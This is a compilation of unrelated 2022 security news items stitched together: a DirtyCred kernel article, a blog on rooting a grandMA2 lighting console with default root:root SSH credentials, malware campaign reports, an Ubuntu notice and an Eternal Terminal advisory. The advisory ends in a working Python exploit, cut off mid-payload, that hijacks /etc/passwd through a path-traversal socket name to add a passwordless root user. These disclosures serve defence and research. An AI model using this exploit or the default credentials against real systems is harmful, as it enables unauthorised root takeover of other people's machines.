Details of an eight-year-old security vulnerability in the Linux kernel have emerged that the researchers say is "as nasty as Dirty Pipe."
Dubbed DirtyCred by a group of academics from Northwestern University, the security weakness exploits a previously unknown flaw (CVE-2022-2588) to escalate privileges to the maximum level.
"DirtyCred is a kernel exploitation concept that swaps unprivileged

Details of an eight-year-old security vulnerability in the Linux kernel have emerged that the researchers say is "as nasty as Dirty Pipe."

Dubbed **DirtyCred** by a group of academics from Northwestern University, the security weakness exploits a previously unknown flaw (CVE-2022-2588) to escalate privileges to the maximum level.

"DirtyCred is a kernel exploitation concept that swaps unprivileged kernel credentials with privileged ones to escalate privilege," researchers Zhenpeng Lin, Yuhang Wu, and Xinyu Xing noted. "Instead of overwriting any critical data fields on kernel heap, DirtyCred abuses the heap memory reuse mechanism to get privileged."

This entails three steps -

*   Free an in-use unprivileged credential with the vulnerability
*   Allocate privileged credentials in the freed memory slot by triggering a privileged userspace process such as su, mount, or sshd
*   Operate as a privileged user

The novel exploitation method, according to the researchers, pushes the dirty pipe to the next level, making it more general as well as potent in a manner that could work on any version of the affected kernel.

"First, rather than tying to a specific vulnerability, this exploitation method allows any vulnerabilities with double-free ability to demonstrate dirty-pipe-like ability," the researchers said.

"Second, while it is like the dirty pipe that could bypass all the kernel protections, our exploitation method could even demonstrate the ability to escape the container actively that Dirty Pipe is not capable of."

Dirty Pipe, tracked as CVE-2022-0847 (CVSS score: 7.8) and affecting Linux kernel versions starting from 5.8, refers to a security vulnerability in the pipe subsystem that allows underprivileged processes to write to arbitrary readable files, leading to privilege escalation.

The exploitable vulnerability was so called after the Dirty Cow vulnerability discovered in 2016 based on their similarities.

Given that objects are isolated based on their type and not privileges, the researchers recommend isolating privileged credentials from unprivileged ones using virtual memory to prevent cross-cache attacks.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

"As Nasty as Dirty Pipe" — 8 Year Old Linux Kernel Vulnerability Uncovered

MA Lighting grandMA2 Light has a password of root for the root account. NOTE: The vendor's position is that the product was designed for isolated networks. Also, the successor product, grandMA3, is not affected by this vulnerability.

**Act 1: Opening**

A significant amount of time and effort go into preparing the sound and lighting for a concert. Having once been in charge of both for theatre productions, I know just how stressful it can be when a microphone stops working mid performance or when the timing is a few seconds off on a lighting cue.

Something that I always wished for when working in theatre tech was the ability to tweak the lighting and sound remotely. Often times I had to hop down from the control booth, check on something, and quickly climb back up my ladder. It would have been significantly easier to tune settings from either my phone or laptop on the fly.

Well, apparently that’s possible now and I’m just getting old. Controlling a lighting console either via a mobile application or remote control appears to be common now - especially since we can just connect the console to WiFi _because connecting everything to WiFi is a good idea_.

Thus begins the story of how I obtained a root shell on a $60,000 lighting console in a few minutes. Keep in mind that this did not require some fancy exploit or l33t out of the box thinking - **spoiler** all it took was connecting to an unsecured access point, a quick ping sweep, port scan, and trying some ‘dumb’ default credentials on a remote service.

**Act 2: The First Mistake**

Everything started one Thursday night when I attended a metal show. If you know anything about me, it’s that I **love** doomscrolling on Twitter. Arriving to a metal show about an hour early and learning that there was no cellular connection in the venue meant that reading InfoSec drama on Twitter wasn’t a possibility and my suffering was imminent.

So what does everyone do when they have no cellular connection? We look for open access points; bonus points if those access points don’t have a captive portal (looking at you Starbucks and Barnes & Noble).

Sure enough, upon popping open the trusty hacker tool “Settings” on my iPhone and carefully navigating to the “WiFi” menu, I identified an open access point named “WAVLINK-N”.

Now, before we even start scanning. Let’s run a quick Google search for “WAVLINK-N” to see what comes up. One of the first results is how to sign into a WAVLINK network device, allowing us to easily enumerate that we’ve connected to a WAVLINK router:

If you’ve gone anywhere and asked for the WiFi password before, then you know that they will (mostly) always hand you access to the guest network - meaning that you are unable to access back of house devices such as the security cameras, PoS systems, music streaming system, or anything else that the business has hooked up.

**Note:** This is not always the case. The coffee shop I frequent asked me to perform some light scanning of their network to see if “anything came up”. Upon scanning I observed that their recent security camera installations were connected to the guest network - a misconfiguration which allowed me to watch myself drink a caramel macchiato (so cool).

This is what I expected to be the case until I observed I was placed onto the 192.168.10.0/24 subnet. Big oops.

This means that we can access the Router login accessible at http://192.168.10.1 as stated in the previously identified documentation. If we wanted to launch exploits at this router we could attempt to search for WAVLINK router vulnerabilities, login with default credentials, and/or brute force valid credentials to the login.

Well, out of pure curiosity I attempted to sign-in with default credentials using the password admin but was unsuccessful. That’s fine but now I’m getting _very_ curious, let’s run a ping sweep to see if we can identify any other devices.

> Quick note, I am friends with one of the managers of this venue so please don’t cancel me for doing hard crime. I verified prior to scanning that I was clear to poke around a little bit (and not break anything).

**Act 3: The Scanning**

Let’s address something really quickly before going any further. I’m an iPhone user.. I know, laugh it up. But that means my methods of scanning a network when I don’t have my laptop are limited. Personally, I like using Fing for quick scans. It’s also worth mentioning that there are several benefits to the app if you’re not a l33t hax0r such as scanning an Airbnb rentals network to identify hidden cameras (but that’s a topic for another day, I’m not sponsored). /rant

This is also to preface that I wasn’t able to take too many screenshots of this device, and they’re all off of my phone. I was too busy headbanging and hanging out with good people to remember that I should screenshot everything I was observing at the time. Additionally, the following day when notifying my PoC they wanted to immediately fix this console and remove the access point (I might get some time around the holidays to mess around with this console further though).

Anyways, back on topic. When I see ftp and/or ssh enabled, I want to try seeing if I can authenticate to the root user with default or weak credentials. Do you see where I’m going with this? Keep in mind, at this point in time I had no information or what device this actually was. The following screenshot demonstrates that I was able to use Termius to attempt to SSH into the device:

I know.. Not the greatest screenshot. It would be signifcantly more satisfying if I had CrackMapExec or Hydra installed on my phone to have the “password found” displayed.. Nevertheless, I attempted to login with the password toor originally which was unsuccessful.

Following this, I tried the most complex password I could think of and attempted to sign-in with the password root.. Surely enough, I soon observed that I successfully was dropped into a shell on the system:

Oh boy.. fourteen minutes before the show starts and I have obtained a shell on something called grandMA2-light. Chills. Prior to running any commands, the first thing I am going to do is run a quick search for the hostname and see what comes up:

Things are starting to quickly make sense. It looks as though the console can actually do more than lights, there’s also the possibility of controlling “video and media” as stated in the description. Next I want to actually see what the device looks like, which did not disappoint:

Damn.. This looks awesome, it can probably run DOOM. From reading some of the documentation I also learned that you have access to the command line on the device. Taking an image from the documentation, it should look a little like this:

Upon a little more research, I came across the price of this unit (originally), this is when I decided on the name of this post:

Yep. You are reading that correctly. Having seen this beast in person, I believe it it is the grandMA2 light version (as referenced in the hostname). It is probably the most expensive shell I’ve ever popped.

So what next? Well, I ran a few commands on the system. Sadly I didn’t screenshot them all but I did find some interesting things in the short period of time I had. I first enumerated binaries on the host and observed that I was dropped into your standard bash shell. Additionally, binaries that would be installed on a typical Linux system were available to me.

After confirming that I would be able to run commands and I wasn’t in some type of limited environment, I decided to run ifconfig to display some basic information about the configured interfaces:

That’s always some good information to have. I was also interested in running netstat -ant to view network connections for the device:

We see some interesting information here such as a HTTP service, and other TCP ports such as 80, 6000, 7001, 7003, 7005, 30000, and 30001 which are listening. While I would love to investigate all of these, I sadly did not have the time. If I had to guess, these are most likely used by the device for different features such as lights, LEDs, and video.. It’s hard to guess since there’s so much going on under the hood.

One of the more interesting things I found was from running ps -aef on the device:

It always feels like a CTF when I see a custom binary. I observed two interesting files here, namely /usr/sbin/gmad and /data/ma/actual/gma2. With the concert being so close to starting, I was hesitant to mess with either of these “in prod”. I can only imagine that removing the gmad binary would be devastating and require the system to be reset in some capacity.

Otherwise, I wasn’t able to find anything else of interest within time I had on the device. As I mention later on in this article, it was revealed that the device runs a “Custom Linux OS”. From my observations this looks as though it’s just an Ubuntu installation with some custom binaries and minor configurations made. There doesn’t appear to be any hardening done on the system that I observed, it’s likely that uploading your tool of choice (such as Nmap or Responder) would function perfectly fine if you installed the appropriate dependencies.

Following the concert, I decided to reach out to the vendor, ‘MA Lighting’ and request information on my findings. When asking my point of contact, they stated that it was unclear if someone had manually made those changes as it was an older lighting console. In my first email I asked the following:

> Good afternoon,
> 
> I recently performed a small network audit and identified a grandMA2 lighting console. I was able to successfully SSH into the device to obtain root-level access with the credentials: root:root.
> 
> Is this the default configuration for the device? Is changing the root accounts password acceptable or will this cause issues with the console?

The reason I ask if changing the credentials on the device would cause any issues is simply because this is a device I hadn’t even heard about until last night. I was unsure if there was some SSH magic going on under the hood, and/or if the credentials were required some other functionality I wasn’t unable to identify.

A few days later I received a reply from MA Lighting stating that changing the SSH credentials stating the following:

> Yes, you can change the SSH credentials if you would like - it should not affect the performance of the desk. The updated credentials will persist through software updates as well, unless you have to perform a Factory Reset.

Perfect! We now know how to remediate the identified issue. I forwarded this information to my contact and sent another email to MA Lighting asking again if the identified credentials of root:root were the default for the device. I was told the dev team would need to answer that and they’d be in touch. Surely enough, after waiting a few days I received a reply stating the following:

>   Yes, SSH is enabled by default, and those are the default credentials. However, because the consoles are a custom Linux OS with no personal, medical, or financial data stored on them, the devs haven’t felt the need to change this.

Well, that’s half the answer I was expecting. While I understand the reasoning, it’s now my job to state the risks of this system having default credentials. I sent a reply with the following information shortly after (I redacted a few sentences with links provided at the bottom of this post):

> Alongside the risks I detailed in the previous email such as the lighting console being used as a foothold on the network, and DoS attacks being conducted against it - default credentials with a remote management port exposed by default as SSH being open is a high-risk issue that would allow for an attacker to potentially establish persistence, and attack other devices on the network. 
> 
> If SSH is not required (which it does not appear to be, from my understanding), it should be disabled. Alternatively, users could be provided with a randomly generated password upon setting up the device.
> 
> There are multiple CVE’s associated with default credentials. I plan to request one to be used for reference on this issue. I’d love to assist in the process and align with your internal standards of this. Please let me know if this issue is something that the dev team will fix or release guidance on in the near future!

I received a reply the following week which I do not want to completely share the details of since I think they _could_ be considered sensitive so I’m going to hit you with a brief summary, broken down into a few points in the following section.

**The Breakdown**

MA Lighting stated that the grandMA2 was designed for isolated networks, not public networks. While to no fault of their own, customers who are not aware of the risks will place it in the first place it works.

Additionally, MA Lighting stated that changing the grandMA2 so that SSH and Telnet access work differently be default would require serious work on the operating system. At this stage of the grandMA2’s development, this is unlikely to happen.

grandMA3 (the successor to grandMA2) is designed with being a part of public networks. There is no longer Telnet access to Linux and additional access can be disabled within the Mode2 software. Additionally, SSH is enabled but no longer uses the default credentials.

**Act 5: The Finale**

To be honest, I thought the reply from MA Lighting was more than sufficient. While the grandMA2 appears to have multiple security issues, it’s appears as though these have been remediated with the release of the grandMA3.

If the message wasn’t clear, this is _very_ bad regardless of how common this device is. With little effort, I was able to obtain a root shell, and established a very good foothold on the network. Additionally, it’s extremely likely I would be able to easily upload and/or download whatever binaries I wanted to the system.

There’s also other considerations to take into account. For example, as stated in my emails to MA Lighting I could have ran a DoS attack against the system such as a ‘Fork bomb’, it’s possible that the system would be rendered completely inoperable. Alternatively, an attacker could reboot, shutdown, and/or delete inportant binaries on the system.

While I’d love to believe that rebooting the device would turn off all the lights in the venue like something from Watchdogs.. From my extremely brief background in theatre tech, it is more likely that it would render the lighting console inoperable until it has successfully rebooted, the lights would most likely freeze in their current “cue”. The tech would then be able to move forward to the next “cue” once the system rebooted and resume the show without a blackout. There’a also the possibility that an attacker would be able to connect to the device with the appropriate MA Lighting software and take remote control of the system, sabotaging the show in the process.

Although this system is unlikely to be encountered in your ‘typical corporate environment’, they exist out there. Personally, an opportunity has never presented itself to me where I can mess around with tech equipment such as a sound and/or lighting console but it’s an area of devices that seems to have gone completely under the radar.

Additionally, something worth mentioning about this issue is that the target audience for this device is most likely not aware that SSH is open in the first place. I could not find documentation online discussing the use of the default credentials, nor any information about the ‘Custom Linux OS’. It’s likely if you find one of these in the wild, it’s going to have SSH wide open.

Finally, (I promise, final thought) I haven’t seen any security research of these devices before. I would not be surprised to discover that similar devices are using default credentials or are vulnerable to other low-hanging fruit vulnerabilities. This is an area of security that seems to be unexplored and I’m looking forward to hopefully raising some awareness.

I’ll happily pentest your lighting/sound consoles for some coffee :)

**Timeline**

*   April 7 - I attend a metal show, have no WiFi, connected to an open access point, and burgled a root shell on a lighting console more expensive than my college debt.
*   April 8 - I notified the PoC I have at the venue of the finding and messaged MA Lighting asking for clarification on the devices default configuration.
*   April 14 - Heard back from MA Lighting and began to discuss the default configuration of the device and how to remediate this issue.
*   April 16 - MA Lighting replied and stated that they would need to get information from their developers to determine if both SSH was open, and the credentials root:root were used by default.
*   April 20 - MA Lighting informed me that these were the default credentials, SSH is open by default, and the developers of the grandMA2 did not see this as a security risk. The reasoning provided was that the system doesn’t store any financial/personal data. I replied to the email detailing what the host could be used for, possible system disruption, and providing appropriate references to CWE and MITRE ATT&CK.
*   April 26 - Received reply from MA Lighting with additional information, stating that the issue is unlikely to be resolved and the following release (grandMA3) has remediated the issue identified.
*   April 26 - Requested a CVE from MITRE.
*   August 20 - Sent a follow up email to MITRE and received assignment CVE-2022-30036.

**FAQ****Were you able to doomscroll Twitter?**

No. The network did not have Internet access :(

**So I can just port scan every network and get r00t?**

All the cool kids are so why not? _/s_

On a serious note, port scanning is a gray area because no laws exist for it. While I know we all run around shouting “port scanning is not a crime” with our black hoodies and thirty DEFCON badges on, this may not always be the case. I’m not a lawyer so don’t ask me though! :)

**Default Credentials = CVE. Lulz.**

Yeah, I’m with you. I walked the dinosaur around my room deciding if this is something I should even bother requesting a CVE for. At the end of the day it gave me default raspberry pi credential vibes. I hate to be that guy, but default credentials are always bad, and there really isn’t a good excuse to ever use them.

**Thanks**

*   Thanks to MA Lighting for being open to discussing this issue with me even though I’m not a customer and taking the time to relay messages between myself and the dev team.
*   Thanks to my good friend Catatonic for listening to me rant a little about this and sending me some references.
*   Thanks to you.. Yeah **YOU** for reading this post. I know it wasn’t a high-level RCE exploit with a PoC provided but this was a fun one to write and I appreciate you for reading it <3

CVE-2022-30036: Pwning a $60,000 Lighting Console in a Few Minutes

Organizations in the Spanish-speaking nations of Mexico and Spain are in the crosshairs of a new campaign designed to deliver the Grandoreiro banking trojan. 
"In this campaign, the threat actors impersonate government officials from the Attorney General's Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute '

Organizations in the Spanish-speaking nations of Mexico and Spain are in the crosshairs of a new campaign designed to deliver the **Grandoreiro** banking trojan.

"In this campaign, the threat actors impersonate government officials from the Attorney General's Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute 'Grandoreiro,' a prolific banking trojan that has been active since at least 2016, and that specifically targets users in Latin America," Zscaler said in a report.

The ongoing attacks, which commenced in June 2022, have been observed to target automotive, civil and industrial construction, logistics, and machinery sectors via multiple infection chains in Mexico and chemicals manufacturing industries in Spain.

Attack chains entail leveraging spear-phishing emails written in Spanish to trick potential victims into clicking on an embedded link that retrieves a ZIP archive, from which is extracted a loader that masquerades as a PDF document to trigger the execution.

The phishing messages prominently incorporate themes revolving around payment refunds, litigation notifications, cancellation of mortgage loans, and deposit vouchers, to activate the infections.

"This \[loader\] is responsible for downloading, extracting and executing the final 400MB 'Grandoreiro' payload from a Remote HFS server which further communicates with the \[command-and-control\] Server using traffic identical to LatentBot," Zscaler researcher Niraj Shivtarkar said.

That's not all. The loader is also designed to gather system information, retrieve a list of installed antivirus solutions, cryptocurrency wallets, banking, and mail apps, and exfiltrate the information to a remote server.

Observed in the wild for at least six years, Grandoreiro is a modular backdoor with an array of functionalities that allows it to record keystrokes, execute arbitrary commands, mimic mouse and keyboard movements, restrict access to specific websites, auto-update itself, and establish persistence via a Windows Registry change.

What's more, the malware is written in Delphi and utilizes techniques like binary padding to inflate the binary size by 200MB, CAPTCHA implementation for sandbox evasion, and C2 communication using subdomains generated via a domain generation algorithm (DGA).

The CAPTCHA technique, in particular, requires the manual completion of the challenge-response test to execute the malware in the compromised machine, meaning that the implant is not run unless and until the CAPTCHA is solved by the victim.

The findings suggest that Grandoreiro is continuously evolving into a sophisticated malware with novel anti-analysis characteristics, granting the attackers full remote access capabilities and posing significant threats to employees and their organizations.

The development also arrives a little over a year after Spanish law enforcement agencies apprehended 16 individuals belonging to a criminal network in connection with operating Mekotio and Grandoreiro in July 2021.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Grandoreiro Banking Malware Campaign Targeting Spanish Manufacturers

The cybercriminal crew has used 15 malware families to target travel and hospitality companies globally, constantly changing tactics over the course of its four-year history.

Another threat actor targeting hospitality, hotel, and travel organizations has re-emerged during the busy summer travel season: a smaller, financially motivated player named TA558.  

According to new research from Proofpoint, the group has been around since 2018 but is stepping up its attacks this year, targeting Portuguese and Spanish speakers located in Latin America, as well as targets in western Europe and North America.

Spanish, Portuguese, and occasional English-language emails use reservation-themed lures with business-relevant themes (such as hotel-room bookings) to distribute malicious attachments or URLs.

Proofpoint researchers have counted 15 different malware payloads, most frequently remote access Trojans (RATs), that can enable reconnaissance, data theft, and distribution of follow-on malware.

These malware families occasionally overlap with command-and-control (C2) domains, with the most frequently observed payloads including Loda, Vjw0rm, AsyncRAT, and Revenge RAT.

The report explains that in recent years, TA558 has shifted tactics, starting to use URLs and container files to distribute malware.

"TA558 began using URLs more frequently in 2022. TA558 conducted 27 campaigns with URLs in 2022, compared to just five campaigns total from 2018 through 2021," according to the report. "Typically, URLs led to container files such as ISOs or zip files containing executables."

Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, explains this is likely in response to Microsoft announcing it would begin blocking VBA macros downloaded from the Internet by default.

"This actor is unique in that they have used the same lure themes, language, and targeting since Proofpoint first identified them in 2018," she tells Dark Reading.

However, she points out they often change tactics, techniques, and procedures (TTPs) and have used different malware payloads over the course of their activity.

"This suggests the actor is actively changing and responding to what works best or is most effective in achieving initial infection, using tactics and malware widely used by a variety of threat actors," she says.

She explains like many threat actors in the threat landscape, TA558 has pivoted away from macros in attachments to using other filetypes and URLs to distribute malware.

"It is likely other actors targeting these industries will use similar techniques that we described previously," she says.

Threat actors have pivoted away from macro-enabled documents attached directly to messages to deliver malware, increasingly using container files such as ISO and RAR attachments and Windows Shortcut (LNK) files.

DeGrippo says the increase in activity by TA558 this year is not indicative of an increase of activity targeting the travel/hospitality industries in general.

"However, organizations in these industries should be aware of the TTPs described in the report, and ensure employees are trained to identify and report phishing attempts when identified," she advises.

**Travel Industry in Threat Actor Crosshairs**

Attacks against travel-related websites began to rise months ago as the industry recovered from COVID-19, a July report from PerimeterX indicated, with competitive scraping-bot requests increasing dramatically in Europe and Asia.

As the coronavirus pandemic ebbs and consumers look to resume annual vacation plans, fraudsters are refocusing their efforts from financial services to the travel and leisure industries, according to TransUnion's latest quarterly analysis.

Multiple cybercrime groups have been spotted this year selling stolen credentials and other sensitive personal information pilfered from travel-related websites, with the methods of malicious actors evolving due to the concentration on personally identifiable information.

Summertime Blues: TA558 Ramps Up Attacks on Hospitality, Travel Sectors

The Freedom of Information Act helps Americans learn what the government is up to. The Poseys exploited it—and became unlikely defenders of transparency.

The Family That Mined the Pentagon's Data for Profit

Ubuntu Security Notice 5526-2 - USN-5526-1 fixed vulnerabilities in PyJWT. Unfortunately this caused a regression by incrementing the internal package version number on Ubuntu 22.04 LTS. This update fixes the problem. Aapo Oksman discovered that PyJWT incorrectly handled signatures constructed from SSH public keys. A remote attacker could use this to forge a JWT signature.

=========================================================================  
Ubuntu Security Notice USN-5526-2  
August 17, 2022

pyjwt regression  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

USN-5526-1 introduced a regression in PyJWT.

Software Description:  
- pyjwt: Python 3 implementation of JSON Web Token

Details:

USN-5526-1 fixed vulnerabilities in PyJWT. Unfortunately this caused a  
regression by incrementing the internal package version number on Ubuntu  
22.04 LTS.  This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Aapo Oksman discovered that PyJWT incorrectly handled signatures  
 constructed from SSH public keys. A remote attacker could use this to forge  
 a JWT signature.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  python3-jwt                     2.3.0-1ubuntu0.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5526-2  
  https://ubuntu.com/security/notices/USN-5526-1  
  https://launchpad.net/bugs/1986487

Package Information:  
  https://launchpad.net/ubuntu/+source/pyjwt/2.3.0-1ubuntu0.2

Ubuntu Security Notice USN-5526-2

The North Korean APT is using a fake job posting for Coinbase in a cyberespionage campaign targeting users of both Apple and Intel-based systems.

The North Korean APT is using a fake job posting for Coinbase in a cyberespionage campaign targeting users of both Apple and Intel-based systems.

North Korean APT Lazarus is up to its old tricks with a cyberespionage campaign targeting engineers with a fake job posting that attempt to spread macOS malware. The malicious Mac executable used in the campaign targets both Apple and Intel chip-based systems.

The campaign, identified by researchers from ESET Research Labs and revealed in a series of tweets posted Tuesday, impersonates cryptocurrency trader Coinbase in a job description claiming to seek an engineering manager for product security, researchers divulged.

Dubbed Operation In(ter)ception, the recent campaign drops a signed Mac executable disguised as a job description for Coinbase, which researchers discovered uploaded to VirusTotal from Brazil, they wrote.“Malware is compiled for both Intel and Apple Silicon,” according to one of the tweets. “It drops three files: a decoy PDF document Coinbase\_online\_careers\_2022\_07.pdf, a bundle http\[://\]FinderFontsUpdater\[.\]app and a downloader safarifontagent.”

**Similarities to Previous Malware**

The malware is similar to a sample discovered by ESET in May, which also included a signed executable disguised as a job description, was compiled for both Apple and Intel, and dropped a PDF decoy, researchers said.

However, the most recent malware is signed July 21, according to its timestamp, which means it’s either something new or a variant of the previous malware. It uses a certificate issued in February 2022 to a developer named Shankey Nohria and which was revoked by Apple on Aug. 12, researchers said. The app itself was not notarized.

Operation In(ter)ception also has a companion Windows version of the malware dropping the same decoy and spotted Aug. 4 by Malwarebytes threat intelligence researcher Jazi, according to ESET.

The malware used in the campaign also connects to a different command and control (C2) infrastructure than the malware discovered in May, https:\[//\]concrecapital\[.\]com/%user%\[.\]jpg, which did not respond when researchers tried to connect to it.

**Lazarus on the Loose**

North Korea’s Lazarus is well known as one of the most prolific APTs and already is in the crosshairs of international authorities, having been sanctioned back in 2019 by the U.S. government.

Lazarus is known for targeting academics, journalists and professionals in various industries—particularly the defense industry–to gather intelligence and financial backing for the regime of Kim Jong-un. It has often used impersonation ploys similar to the one observed in Operation In(ter)ception to try to get victims to take the malware bait.

A previous campaign identified in January also targeted job-seeking engineers by dangling fake employment opportunities at them in a spear-phishing campaign. The attacks used Windows Update as a living-off-the-land technique and GitHub as a C2 server.

Meanwhile, a similar campaign uncovered last year saw Lazarus impersonating defense contractors Boeing and General Motors and claiming to seek job candidates only to spread malicious documents.

**Changing It Up**

However, more recently Lazarus has diversified its tactics, with the feds revealing that Lazarus also has been responsible for a number of crypto heists aimed at padding the regime of Jong-un with cash.

Related to this activity, the U.S. government levied sanctions against cryptocurrency mixer service Tornado Cash for helping Lazarus launder cash from its cybercriminal activities, which they believe in part are being to fund North Korea’s missile program.

Lazarus even has dipped its toe in ransomware amid its frenzy of cyberextortion activity. In May, researchers at cybersecurity firm Trellix tied the recently emerged VHD ransomware to the North Korean APT.

APT Lazarus Targets Engineers with macOS Malware

A race condition exists in Eternal Terminal prior to version 6.2.0 that allows an authenticated attacker to hijack other users' SSH authorization socket, enabling the attacker to login to other systems as the targeted users. The bug is in UserTerminalRouter::getInfoForId().

@@ -13,7 +13,7 @@ int PipeSocketHandler::connect(const SocketEndpoint& endpoint) {

FATAL\_FAIL(sockFd);

initSocket(sockFd);

remote.sun\_family = AF\_UNIX;

strcpy(remote.sun\_path, pipePath.c\_str());

strncpy(remote.sun\_path, pipePath.c\_str(), sizeof(remote.sun\_path));

  

VLOG(3) << "Connecting to " << endpoint << " with fd " << sockFd;

int result =

@@ -104,7 +104,7 @@ set<int> PipeSocketHandler::listen(const SocketEndpoint& endpoint) {

FATAL\_FAIL(fd);

initServerSocket(fd);

local.sun\_family = AF\_UNIX; /\* local is declared before socket() ^ \*/

strcpy(local.sun\_path, pipePath.c\_str());

strncpy(local.sun\_path, pipePath.c\_str(), sizeof(local.sun\_path));

unlink(local.sun\_path);

  

FATAL\_FAIL(::bind(fd, (struct sockaddr\*)&local, sizeof(sockaddr\_un)));

CVE-2022-24950: red fixes (#468) · MisterTea/EternalTerminal@900348b

A privilege escalation to root exists in Eternal Terminal prior to version 6.2.0. This is due to the combination of a race condition, buffer overflow, and logic bug all in PipeSocketHandler::listen().

**Vulnerability Description:**

An authenticated attacker can send a crafted packet to an Eternal Terminal server which allows them to change the ownership permissions on an arbitrary file. This can be leveraged to gain root privileges on the server.

This was due to a combination of a race condition and a buffer overflow in PipeSocketHandler::listen() as well as a logic bug in the PortForwardHandler:createSource().

The logic bug: If you send a crafted InitialPayload packet containing a PortForwardSourceRequest and arbitrary SocketEndpoint you can invoke a call to PipeSocketHandler::listen() with the arbitrary SocketEndpoint. The name member variable of the SocketEndpoint is used by several system calls in PipeSocketHandler::listen() including unlink(), resulting in arbitrary file delete.

The race condition: Inside PipeSocketHandler::listen(), there are subsequent calls to unlink(), bind(), chmod(), and chown(), to the provided name member variable of SocketEndpoint without verifying the path. If an attacker can modify the file pointed to by the provided name variable (through symlink manipulation for example) between bind() and chmod()/chown(), they can arbitrarily change a file's permission and ownership. I was able to utilize this vulnerability to arbitrarily change the permissions on /etc/passwd, thus resulting in a root privilege escalation. However I found the race condition by itself was not reliable.

The buffer overflow: Inside PipeSocketHandler::listen(), there are no bounds checks on a strcpy() which takes the provided name variable and copies it into the local.sun_path member variable of a socket. The maximum path length for this field is 108 characters, but there is no limit on the size of the name variable, allowing for a stack-based buffer overflow. This could be utilized in a traditional memory corruption exploit (i.e. overwriting return addresses and controlling code execution), but would require additional work in order to prevent failure during the function and the epilog of the function (i.e. the fd variable needs to be valid for bind() and listen(), the pipePath variable needs to point to a crafted fake chunk in order to be freed properly during the function epilog). In this case I abused a discrepancy between path handling in bind(), where it truncates the provided path to 108 characters even if the member variable is longer. By overflowing the local.sun_path I can have the the bind() call point to a different path, which prevents a failure if the file already exists.

In the final exploit I use the name variable of /../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/aaa/etc/passwd, and the race utility creates a large file for unlink in order to improve race condition reliability. In order to run the proof of concept compile the .proto file with protoc, compile the race utility statically for your target and run it locally on the target, and run the python script remotely against the target. This will change the ownership of /etc/passwd on the target machine and create the user root2 which does not require a password to login to.

**Proof of Concept:**

This python file should be run remotely against the ET target.

    #!/usr/bin/env python3
    
    import argparse
    import struct
    import time
    import socket
    import paramiko
    import ET_pb2
    
    PROTOCOL_VERSION = 6
    INITIAL_PAYLOAD = 253
    HEADER_SIZE = 2
    
    parser = argparse.ArgumentParser(description='[*] Root privesc exploit for Eternal Terminal, \
                                                  assumes SSH access to box')
    parser.add_argument('host',type=str,help='target machine')
    parser.add_argument('user',type=str,help='user to SSH as')
    parser.add_argument('--etport',type=int,default='2022',help='port ET is running on')
    parser.add_argument('--sshport',type=int,default='22',help='port SSH is running on')
    parser.add_argument('--racepath',type=str,default='./race',help='location of race utility')
    args = parser.parse_args()
    
    #Initializes SSH/SFTP connection
    def initialize_ssh_connection(host, user, ssh_port):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(host,ssh_port,username=user,timeout=4)
        return ssh
    
    def initiate_client_connection(id, connection):
        #Craft request
        connect_request = ET_pb2.ConnectRequest()
        connect_request.clientId = id
        connect_request.version = PROTOCOL_VERSION
    
        request = connect_request.SerializeToString()
        length = struct.pack('l', len(request))
        #Send Request
        connection.sendall(length)
        connection.sendall(request)
    
    # Send static initial payload, this was pulled from a client communication but could be
    # dynamically constructed as well
    def send_initial_payload(connection, key):
        """
    [INFO 2021-10-27 08:35:43,553 client-main BackedWriter.cpp:17] Hexdump of payload
    000000: 00 00 00 94 01 fd 5f f2 04 d1 66 43 5a 64 44 1e  ......_...fCZdD.
    000010: 54 8f c8 fa 3f 4f 8a e9 c2 03 a0 86 0a 51 cb 37  T...?O.......Q.7
    000020: 7d 95 10 0f 64 8b 2b 1a 2c 7c ac 79 df f9 8b 50  }...d.+.,|.y...P
    000030: 15 7e 5a 5e fb d7 3a 81 65 66 aa 21 80 56 9b 67  .~Z^..:.ef.!.V.g
    000040: 8b be 1a fd 85 2e 90 ee 16 46 e8 c7 17 23 a2 d5  .........F...#..
    000050: 27 0c 1d 9c ae fe 3b 47 2b 0f 09 3e a6 31 f9 6d  '.....;G+..>.1.m
    000060: ee df c1 65 63 55 26 ae e5 11 5d a9 df 15 d7 45  ...ecU&...]....E
    000070: 12 a4 df 3e 8f 40 54 51 ab 2c 8a 0d 88 ae 3d 44  ...>.@TQ.,....=D
    000080: c5 0c 2a c5 0a bc 60 48 df 01 f8 70 fb be dc 62  ..*...`H...p...b
    000090: cb 36 a4 42 11 5c fc ac                          .6.B.\..
    
        #Example python code which would generate the payload
        initial_payload = ETerminal_pb2.InitialPayload()
        initial_payload.jumphost = False
        port_forward_source_request = ETerminal_pb2.PortForwardSourceRequest()
        source = ET_pb2.SocketEndpoint()
        destination = ET_pb2.SocketEndpoint()
        sourcePath = '/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/aaa/etc/passwd'
        destinationPath = '/tmp/test'
        source.name = sourcePath
        destination.name = destinationPath
        port_forward_source_request.source.CopyFrom(source)
        port_forward_source_request.destination.CopyFrom(destination)
        #initial_payload.reversetunnels = [port_forward_source_request]
        initial_payload.reversetunnels.append(port_forward_source_request)
        serialized_payload = initial_payload.SerializeToString()
    """
    
        packet = bytes.fromhex("00 00 00 94 01 fd 5f f2 04 d1 66 43 5a 64 44 1e 54 \
        8f c8 fa 3f 4f 8a e9 c2 03 a0 86 0a 51 cb 37 7d 95 10 0f 64 8b 2b 1a 2c 7c \
        ac 79 df f9 8b 50 15 7e 5a 5e fb d7 3a 81 65 66 aa 21 80 56 9b 67 8b be 1a \
        fd 85 2e 90 ee 16 46 e8 c7 17 23 a2 d5 27 0c 1d 9c ae fe 3b 47 2b 0f 09 3e \
